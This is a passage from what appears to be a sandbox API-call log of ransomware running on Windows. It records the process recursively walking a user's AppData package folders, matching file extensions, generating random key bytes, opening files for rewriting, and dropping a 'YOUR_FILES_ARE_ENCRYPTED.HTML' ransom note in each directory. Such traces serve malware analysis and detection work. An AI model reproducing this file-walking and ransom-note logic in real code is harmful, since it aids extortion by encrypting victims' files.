lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*" [0118.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0118.870] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.870] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0118.870] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.870] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 203 [0118.870] GetProcessHeap () returned 0x600000 [0118.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.872] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0118.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0118.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9e6062, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.872] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9e6062, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.872] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x4ec20c8c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x8ab89962, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0118.872] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.872] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 223 [0118.872] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.872] lstrlenW (lpString=".dat") returned 4 [0118.872] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.872] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\microsoft.windows.contentdeliverymanager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0118.873] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8a9e6062, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9e6062, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0118.873] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.873] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 228 [0118.873] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.873] lstrlenW (lpString=".LOG1") returned 5 [0118.873] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.873] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8a9e6062, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9e6062, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0118.873] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.873] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 228 [0118.873] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.873] lstrlenW (lpString=".LOG2") returned 5 [0118.873] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.873] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8a9e6062, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9e6062, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d6d60, dwReserved1=0x6f5ce0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0118.873] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.873] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 233 [0118.873] GetProcessHeap () returned 0x600000 [0118.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\microsoft.windows.contentdeliverymanager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.875] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.876] CloseHandle (hObject=0x320) returned 1 [0118.876] GetProcessHeap () returned 0x600000 [0118.876] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.876] GetProcessHeap () returned 0x600000 [0118.876] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.876] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9e6062, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0118.876] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.877] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 217 [0118.877] GetProcessHeap () returned 0x600000 [0118.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\microsoft.windows.contentdeliverymanager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.880] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.881] CloseHandle (hObject=0x214) returned 1 [0118.881] GetProcessHeap () returned 0x600000 [0118.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.881] GetProcessHeap () returned 0x600000 [0118.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.881] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0118.881] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.881] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState") returned 116 [0118.881] GetProcessHeap () returned 0x600000 [0118.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.881] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState" [0118.881] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\*" [0118.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.881] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.881] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 0 [0118.881] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.882] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0118.882] GetProcessHeap () returned 0x600000 [0118.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.882] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.884] CloseHandle (hObject=0x214) returned 1 [0118.884] GetProcessHeap () returned 0x600000 [0118.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.884] GetProcessHeap () returned 0x600000 [0118.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.885] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0118.885] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.885] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings") returned 112 [0118.885] GetProcessHeap () returned 0x600000 [0118.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.886] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings" [0118.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\*" [0118.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.886] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9b1cc602, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.886] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0118.886] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.886] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\roaming.lock") returned 125 [0118.886] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.886] lstrlenW (lpString=".lock") returned 5 [0118.886] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.886] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x3226a4e5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3226a4e5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, 